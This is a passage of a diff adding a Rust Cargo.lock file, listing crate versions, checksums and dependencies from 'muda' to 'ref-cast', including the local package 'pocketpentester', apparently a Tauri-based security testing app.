+checksum = "50b7e5b27aa02a74bac8c3f23f448f8d87ff11f92d3aac1a6ed369ee08cc56c1"
+dependencies = [
+ "libc",
+ "wasi 0.11.1+wasi-snapshot-preview1",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "muda"
+version = "0.17.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7c9fec5a4e89860383d778d10563a605838f8f0b2f9303868937e5ff32e86177"
+dependencies = [
+ "crossbeam-channel",
+ "dpi",
+ "gtk",
+ "keyboard-types",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-core-foundation",
+ "objc2-foundation",
+ "once_cell",
+ "png",
+ "serde",
+ "thiserror 2.0.18",
+ "windows-sys 0.60.2",
+]
+
+[[package]]
+name = "ndk"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3f42e7bbe13d351b6bead8286a43aac9534b82bd3cc43e47037f012ebfd62d4"
+dependencies = [
+ "bitflags 2.11.1",
+ "jni-sys 0.3.1",
+ "log",
+ "ndk-sys",
+ "num_enum",
+ "raw-window-handle",
+ "thiserror 1.0.69",
+]
+
+[[package]]
+name = "ndk-context"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "27b02d87554356db9e9a873add8782d4ea6e3e58ea071a9adb9a2e8ddb884a8b"
+
+[[package]]
+name = "ndk-sys"
+version = "0.6.0+11769913"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee6cda3051665f1fb8d9e08fc35c96d5a244fb1be711a03b71118828afc9a873"
+dependencies = [
+ "jni-sys 0.3.1",
+]
+
+[[package]]
+name = "neli"
+version = "0.7.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "22f9786d56d972959e1408b6a93be6af13b9c1392036c5c1fafa08a1b0c6ee87"
+dependencies = [
+ "bitflags 2.11.1",
+ "byteorder",
+ "derive_builder",
+ "getset",
+ "libc",
+ "log",
+ "neli-proc-macros",
+ "parking_lot",
+]
+
+[[package]]
+name = "neli-proc-macros"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "05d8d08c6e98f20a62417478ebf7be8e1425ec9acecc6f63e22da633f6b71609"
+dependencies = [
+ "either",
+ "proc-macro2",
+ "quote",
+ "serde",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "new_debug_unreachable"
+version = "1.0.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "650eef8c711430f1a879fdd01d4745a7deea475becfb90269c06775983bbf086"
+
+[[package]]
+name = "nodrop"
+version = "0.1.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72ef4a56884ca558e5ddb05a1d1e7e1bfd9a68d9ed024c21704cc98872dae1bb"
+
+[[package]]
+name = "nom"
+version = "7.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d273983c5a657a70a3e8f2a01329822f3b8c8172b73826411a55751e404a0a4a"
+dependencies = [
+ "memchr",
+ "minimal-lexical",
+]
+
+[[package]]
+name = "num-bigint"
+version = "0.4.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9"
+dependencies = [
+ "num-integer",
+ "num-traits",
+]
+
+[[package]]
+name = "num-conv"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c6673768db2d862beb9b39a78fdcb1a69439615d5794a1be50caa9bc92c81967"
+
+[[package]]
+name = "num-integer"
+version = "0.1.46"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f"
+dependencies = [
+ "num-traits",
+]
+
+[[package]]
+name = "num-traits"
+version = "0.2.19"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841"
+dependencies = [
+ "autocfg",
+]
+
+[[package]]
+name = "num_enum"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5d0bca838442ec211fa11de3a8b0e0e8f3a4522575b5c4c06ed722e005036f26"
+dependencies = [
+ "num_enum_derive",
+ "rustversion",
+]
+
+[[package]]
+name = "num_enum_derive"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "680998035259dcfcafe653688bf2aa6d3e2dc05e98be6ab46afb089dc84f1df8"
+dependencies = [
+ "proc-macro-crate 3.5.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "objc2"
+version = "0.6.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3a12a8ed07aefc768292f076dc3ac8c48f3781c8f2d5851dd3d98950e8c5a89f"
+dependencies = [
+ "objc2-encode",
+ "objc2-exception-helper",
+]
+
+[[package]]
+name = "objc2-app-kit"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d49e936b501e5c5bf01fda3a9452ff86dc3ea98ad5f283e1455153142d97518c"
+dependencies = [
+ "bitflags 2.11.1",
+ "block2",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-foundation",
+]
+
+[[package]]
+name = "objc2-core-foundation"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2a180dd8642fa45cdb7dd721cd4c11b1cadd4929ce112ebd8b9f5803cc79d536"
+dependencies = [
+ "bitflags 2.11.1",
+ "dispatch2",
+ "objc2",
+]
+
+[[package]]
+name = "objc2-core-graphics"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e022c9d066895efa1345f8e33e584b9f958da2fd4cd116792e15e07e4720a807"
+dependencies = [
+ "bitflags 2.11.1",
+ "dispatch2",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-io-surface",
+]
+
+[[package]]
+name = "objc2-encode"
+version = "4.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33"
+
+[[package]]
+name = "objc2-exception-helper"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c7a1c5fbb72d7735b076bb47b578523aedc40f3c439bea6dfd595c089d79d98a"
+dependencies = [
+ "cc",
+]
+
+[[package]]
+name = "objc2-foundation"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272"
+dependencies = [
+ "bitflags 2.11.1",
+ "block2",
+ "objc2",
+ "objc2-core-foundation",
+]
+
+[[package]]
+name = "objc2-io-surface"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "180788110936d59bab6bd83b6060ffdfffb3b922ba1396b312ae795e1de9d81d"
+dependencies = [
+ "bitflags 2.11.1",
+ "objc2",
+ "objc2-core-foundation",
+]
+
+[[package]]
+name = "objc2-quartz-core"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f"
+dependencies = [
+ "bitflags 2.11.1",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-foundation",
+]
+
+[[package]]
+name = "objc2-ui-kit"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d87d638e33c06f577498cbcc50491496a3ed4246998a7fbba7ccb98b1e7eab22"
+dependencies = [
+ "bitflags 2.11.1",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-foundation",
+]
+
+[[package]]
+name = "objc2-web-kit"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b2e5aaab980c433cf470df9d7af96a7b46a9d892d521a2cbbb2f8a4c16751e7f"
+dependencies = [
+ "bitflags 2.11.1",
+ "block2",
+ "objc2",
+ "objc2-app-kit",
+ "objc2-core-foundation",
+ "objc2-foundation",
+]
+
+[[package]]
+name = "oid-registry"
+version = "0.8.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "12f40cff3dde1b6087cc5d5f5d4d65712f34016a03ed60e9c08dcc392736b5b7"
+dependencies = [
+ "asn1-rs",
+]
+
+[[package]]
+name = "once_cell"
+version = "1.21.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "open"
+version = "5.3.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "43bb73a7fa3799b198970490a51174027ba0d4ec504b03cd08caf513d40024bc"
+dependencies = [
+ "dunce",
+ "is-wsl",
+ "libc",
+ "pathdiff",
+]
+
+[[package]]
+name = "option-ext"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04744f49eae99ab78e0d5c0b603ab218f515ea8cfe5a456d7629ad883a3b6e7d"
+
+[[package]]
+name = "ordered-stream"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9aa2b01e1d916879f73a53d01d1d6cee68adbb31d6d9177a8cfce093cced1d50"
+dependencies = [
+ "futures-core",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "pango"
+version = "0.18.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7ca27ec1eb0457ab26f3036ea52229edbdb74dee1edd29063f5b9b010e7ebee4"
+dependencies = [
+ "gio",
+ "glib",
+ "libc",
+ "once_cell",
+ "pango-sys",
+]
+
+[[package]]
+name = "pango-sys"
+version = "0.18.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "436737e391a843e5933d6d9aa102cb126d501e815b83601365a948a518555dc5"
+dependencies = [
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "parking"
+version = "2.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f38d5652c16fde515bb1ecef450ab0f6a219d619a7274976324d5e377f7dceba"
+
+[[package]]
+name = "parking_lot"
+version = "0.12.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "93857453250e3077bd71ff98b6a65ea6621a19bb0f559a85248955ac12c45a1a"
+dependencies = [
+ "lock_api",
+ "parking_lot_core",
+]
+
+[[package]]
+name = "parking_lot_core"
+version = "0.9.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2621685985a2ebf1c516881c026032ac7deafcda1a2c9b7850dc81e3dfcb64c1"
+dependencies = [
+ "cfg-if",
+ "libc",
+ "redox_syscall",
+ "smallvec",
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "pathdiff"
+version = "0.2.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df94ce210e5bc13cb6651479fa48d14f601d9858cfe0467f43ae157023b938d3"
+
+[[package]]
+name = "percent-encoding"
+version = "2.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220"
+
+[[package]]
+name = "phf"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3dfb61232e34fcb633f43d12c58f83c1df82962dcdfa565a4e866ffc17dafe12"
+dependencies = [
+ "phf_shared 0.8.0",
+]
+
+[[package]]
+name = "phf"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fabbf1ead8a5bcbc20f5f8b939ee3f5b0f6f281b6ad3468b84656b658b455259"
+dependencies = [
+ "phf_macros 0.10.0",
+ "phf_shared 0.10.0",
+ "proc-macro-hack",
+]
+
+[[package]]
+name = "phf"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078"
+dependencies = [
+ "phf_macros 0.11.3",
+ "phf_shared 0.11.3",
+]
+
+[[package]]
+name = "phf"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c1562dc717473dbaa4c1f85a36410e03c047b2e7df7f45ee938fbef64ae7fadf"
+dependencies = [
+ "phf_macros 0.13.1",
+ "phf_shared 0.13.1",
+ "serde",
+]
+
+[[package]]
+name = "phf_codegen"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cbffee61585b0411840d3ece935cce9cb6321f01c45477d30066498cd5e1a815"
+dependencies = [
+ "phf_generator 0.8.0",
+ "phf_shared 0.8.0",
+]
+
+[[package]]
+name = "phf_codegen"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a"
+dependencies = [
+ "phf_generator 0.11.3",
+ "phf_shared 0.11.3",
+]
+
+[[package]]
+name = "phf_codegen"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "49aa7f9d80421bca176ca8dbfebe668cc7a2684708594ec9f3c0db0805d5d6e1"
+dependencies = [
+ "phf_generator 0.13.1",
+ "phf_shared 0.13.1",
+]
+
+[[package]]
+name = "phf_generator"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "17367f0cc86f2d25802b2c26ee58a7b23faeccf78a396094c13dced0d0182526"
+dependencies = [
+ "phf_shared 0.8.0",
+ "rand 0.7.3",
+]
+
+[[package]]
+name = "phf_generator"
+version = "0.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5d5285893bb5eb82e6aaf5d59ee909a06a16737a8970984dd7746ba9283498d6"
+dependencies = [
+ "phf_shared 0.10.0",
+ "rand 0.8.5",
+]
+
+[[package]]
+name = "phf_generator"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d"
+dependencies = [
+ "phf_shared 0.11.3",
+ "rand 0.8.5",
+]
+
+[[package]]
+name = "phf_generator"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "135ace3a761e564ec88c03a77317a7c6b80bb7f7135ef2544dbe054243b89737"
+dependencies = [
+ "fastrand",
+ "phf_shared 0.13.1",
+]
+
+[[package]]
+name = "phf_macros"
+version = "0.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "58fdf3184dd560f160dd73922bea2d5cd6e8f064bf4b13110abd81b03697b4e0"
+dependencies = [
+ "phf_generator 0.10.0",
+ "phf_shared 0.10.0",
+ "proc-macro-hack",
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
+[[package]]
+name = "phf_macros"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f84ac04429c13a7ff43785d75ad27569f2951ce0ffd30a3321230db2fc727216"
+dependencies = [
+ "phf_generator 0.11.3",
+ "phf_shared 0.11.3",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "phf_macros"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "812f032b54b1e759ccd5f8b6677695d5268c588701effba24601f6932f8269ef"
+dependencies = [
+ "phf_generator 0.13.1",
+ "phf_shared 0.13.1",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "phf_shared"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c00cf8b9eafe68dde5e9eaa2cef8ee84a9336a47d566ec55ca16589633b65af7"
+dependencies = [
+ "siphasher 0.3.11",
+]
+
+[[package]]
+name = "phf_shared"
+version = "0.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6796ad771acdc0123d2a88dc428b5e38ef24456743ddb1744ed628f9815c096"
+dependencies = [
+ "siphasher 0.3.11",
+]
+
+[[package]]
+name = "phf_shared"
+version = "0.11.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5"
+dependencies = [
+ "siphasher 1.0.2",
+]
+
+[[package]]
+name = "phf_shared"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e57fef6bc5981e38c2ce2d63bfa546861309f875b8a75f092d1d54ae2d64f266"
+dependencies = [
+ "siphasher 1.0.2",
+]
+
+[[package]]
+name = "pin-project-lite"
+version = "0.2.17"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a89322df9ebe1c1578d689c92318e070967d1042b512afbe49518723f4e6d5cd"
+
+[[package]]
+name = "piper"
+version = "0.2.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c835479a4443ded371d6c535cbfd8d31ad92c5d23ae9770a61bc155e4992a3c1"
+dependencies = [
+ "atomic-waker",
+ "fastrand",
+ "futures-io",
+]
+
+[[package]]
+name = "pkg-config"
+version = "0.3.33"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "19f132c84eca552bf34cab8ec81f1c1dcc229b811638f9d283dceabe58c5569e"
+
+[[package]]
+name = "plist"
+version = "1.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "740ebea15c5d1428f910cd1a5f52cebf8d25006245ed8ade92702f4943d91e07"
+dependencies = [
+ "base64 0.22.1",
+ "indexmap 2.14.0",
+ "quick-xml",
+ "serde",
+ "time",
+]
+
+[[package]]
+name = "png"
+version = "0.17.16"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "82151a2fc869e011c153adc57cf2789ccb8d9906ce52c0b39a6b5697749d7526"
+dependencies = [
+ "bitflags 1.3.2",
+ "crc32fast",
+ "fdeflate",
+ "flate2",
+ "miniz_oxide",
+]
+
+[[package]]
+name = "pocketpentester"
+version = "0.1.0"
+dependencies = [
+ "anyhow",
+ "base64 0.22.1",
+ "futures",
+ "hickory-resolver",
+ "hmac",
+ "local-ip-address",
+ "md5",
+ "once_cell",
+ "rand 0.8.5",
+ "regex",
+ "reqwest 0.12.28",
+ "rustls",
+ "rustls-pki-types",
+ "serde",
+ "serde_json",
+ "serde_yaml",
+ "sha2",
+ "tauri",
+ "tauri-build",
+ "tauri-plugin-opener",
+ "tokio",
+ "tokio-rustls",
+ "url",
+ "urlencoding",
+ "walkdir",
+ "x509-parser",
+]
+
+[[package]]
+name = "polling"
+version = "3.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5d0e4f59085d47d8241c88ead0f274e8a0cb551f3625263c05eb8dd897c34218"
+dependencies = [
+ "cfg-if",
+ "concurrent-queue",
+ "hermit-abi",
+ "pin-project-lite",
+ "rustix",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "potential_utf"
+version = "0.1.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0103b1cef7ec0cf76490e969665504990193874ea05c85ff9bab8b911d0a0564"
+dependencies = [
+ "zerovec",
+]
+
+[[package]]
+name = "powerfmt"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391"
+
+[[package]]
+name = "ppv-lite86"
+version = "0.2.21"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9"
+dependencies = [
+ "zerocopy",
+]
+
+[[package]]
+name = "precomputed-hash"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "925383efa346730478fb4838dbe9137d2a47675ad789c546d150a6e1dd4ab31c"
+
+[[package]]
+name = "prettyplease"
+version = "0.2.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b"
+dependencies = [
+ "proc-macro2",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "proc-macro-crate"
+version = "1.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f4c021e1093a56626774e81216a4ce732a735e5bad4868a03f3ed65ca0c3919"
+dependencies = [
+ "once_cell",
+ "toml_edit 0.19.15",
+]
+
+[[package]]
+name = "proc-macro-crate"
+version = "2.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b00f26d3400549137f92511a46ac1cd8ce37cb5598a96d382381458b992a5d24"
+dependencies = [
+ "toml_datetime 0.6.3",
+ "toml_edit 0.20.2",
+]
+
+[[package]]
+name = "proc-macro-crate"
+version = "3.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
+dependencies = [
+ "toml_edit 0.25.11+spec-1.1.0",
+]
+
+[[package]]
+name = "proc-macro-error"
+version = "1.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "da25490ff9892aab3fcf7c36f08cfb902dd3e71ca0f9f9517bea02a73a5ce38c"
+dependencies = [
+ "proc-macro-error-attr",
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+ "version_check",
+]
+
+[[package]]
+name = "proc-macro-error-attr"
+version = "1.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1be40180e52ecc98ad80b184934baf3d0d29f979574e439af5a55274b35f869"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "version_check",
+]
+
+[[package]]
+name = "proc-macro-error-attr2"
+version = "2.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96de42df36bb9bba5542fe9f1a054b8cc87e172759a1868aa05c1f3acc89dfc5"
+dependencies = [
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
+name = "proc-macro-error2"
+version = "2.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11ec05c52be0a07b08061f7dd003e7d7092e0472bc731b4af7bb1ef876109802"
+dependencies = [
+ "proc-macro-error-attr2",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "proc-macro-hack"
+version = "0.5.20+deprecated"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dc375e1527247fe1a97d8b7156678dfe7c1af2fc075c9a4db3690ecd2a148068"
+
+[[package]]
+name = "proc-macro2"
+version = "1.0.106"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934"
+dependencies = [
+ "unicode-ident",
+]
+
+[[package]]
+name = "psl-types"
+version = "2.0.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "33cb294fe86a74cbcf50d4445b37da762029549ebeea341421c7c70370f86cac"
+
+[[package]]
+name = "publicsuffix"
+version = "2.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6f42ea446cab60335f76979ec15e12619a2165b5ae2c12166bef27d283a9fadf"
+dependencies = [
+ "idna",
+ "psl-types",
+]
+
+[[package]]
+name = "quick-xml"
+version = "0.38.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b66c2058c55a409d601666cffe35f04333cf1013010882cec174a7467cd4e21c"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "quinn"
+version = "0.11.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b9e20a958963c291dc322d98411f541009df2ced7b5a4f2bd52337638cfccf20"
+dependencies = [
+ "bytes",
+ "cfg_aliases",
+ "pin-project-lite",
+ "quinn-proto",
+ "quinn-udp",
+ "rustc-hash",
+ "rustls",
+ "socket2",
+ "thiserror 2.0.18",
+ "tokio",
+ "tracing",
+ "web-time",
+]
+
+[[package]]
+name = "quinn-proto"
+version = "0.11.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "434b42fec591c96ef50e21e886936e66d3cc3f737104fdb9b737c40ffb94c098"
+dependencies = [
+ "bytes",
+ "getrandom 0.3.4",
+ "lru-slab",
+ "rand 0.9.4",
+ "ring",
+ "rustc-hash",
+ "rustls",
+ "rustls-pki-types",
+ "slab",
+ "thiserror 2.0.18",
+ "tinyvec",
+ "tracing",
+ "web-time",
+]
+
+[[package]]
+name = "quinn-udp"
+version = "0.5.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "addec6a0dcad8a8d96a771f815f0eaf55f9d1805756410b39f5fa81332574cbd"
+dependencies = [
+ "cfg_aliases",
+ "libc",
+ "once_cell",
+ "socket2",
+ "tracing",
+ "windows-sys 0.60.2",
+]
+
+[[package]]
+name = "quote"
+version = "1.0.45"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924"
+dependencies = [
+ "proc-macro2",
+]
+
+[[package]]
+name = "r-efi"
+version = "5.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f"
+
+[[package]]
+name = "r-efi"
+version = "6.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf"
+
+[[package]]
+name = "rand"
+version = "0.7.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
+dependencies = [
+ "getrandom 0.1.16",
+ "libc",
+ "rand_chacha 0.2.2",
+ "rand_core 0.5.1",
+ "rand_hc",
+ "rand_pcg",
+]
+
+[[package]]
+name = "rand"
+version = "0.8.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404"
+dependencies = [
+ "libc",
+ "rand_chacha 0.3.1",
+ "rand_core 0.6.4",
+]
+
+[[package]]
+name = "rand"
+version = "0.9.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "44c5af06bb1b7d3216d91932aed5265164bf384dc89cd6ba05cf59a35f5f76ea"
+dependencies = [
+ "rand_chacha 0.9.0",
+ "rand_core 0.9.5",
+]
+
+[[package]]
+name = "rand_chacha"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
+dependencies = [
+ "ppv-lite86",
+ "rand_core 0.5.1",
+]
+
+[[package]]
+name = "rand_chacha"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88"
+dependencies = [
+ "ppv-lite86",
+ "rand_core 0.6.4",
+]
+
+[[package]]
+name = "rand_chacha"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb"
+dependencies = [
+ "ppv-lite86",
+ "rand_core 0.9.5",
+]
+
+[[package]]
+name = "rand_core"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
+dependencies = [
+ "getrandom 0.1.16",
+]
+
+[[package]]
+name = "rand_core"
+version = "0.6.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c"
+dependencies = [
+ "getrandom 0.2.17",
+]
+
+[[package]]
+name = "rand_core"
+version = "0.9.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "76afc826de14238e6e8c374ddcc1fa19e374fd8dd986b0d2af0d02377261d83c"
+dependencies = [
+ "getrandom 0.3.4",
+]
+
+[[package]]
+name = "rand_hc"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
+dependencies = [
+ "rand_core 0.5.1",
+]
+
+[[package]]
+name = "rand_pcg"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429"
+dependencies = [
+ "rand_core 0.5.1",
+]
+
+[[package]]
+name = "raw-window-handle"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539"
+
+[[package]]
+name = "redox_syscall"
+version = "0.5.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d"
+dependencies = [
+ "bitflags 2.11.1",
+]
+
+[[package]]
+name = "redox_users"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a4e608c6638b9c18977b00b475ac1f28d14e84b27d8d42f70e0bf1e3dec127ac"
+dependencies = [
+ "getrandom 0.2.17",
+ "libredox",
+ "thiserror 2.0.18",
+]
+
+[[package]]
+name = "ref-cast"
+version = "1.0.25"
+source = "registry+https://github.com/rust-lang/crates.io-index"
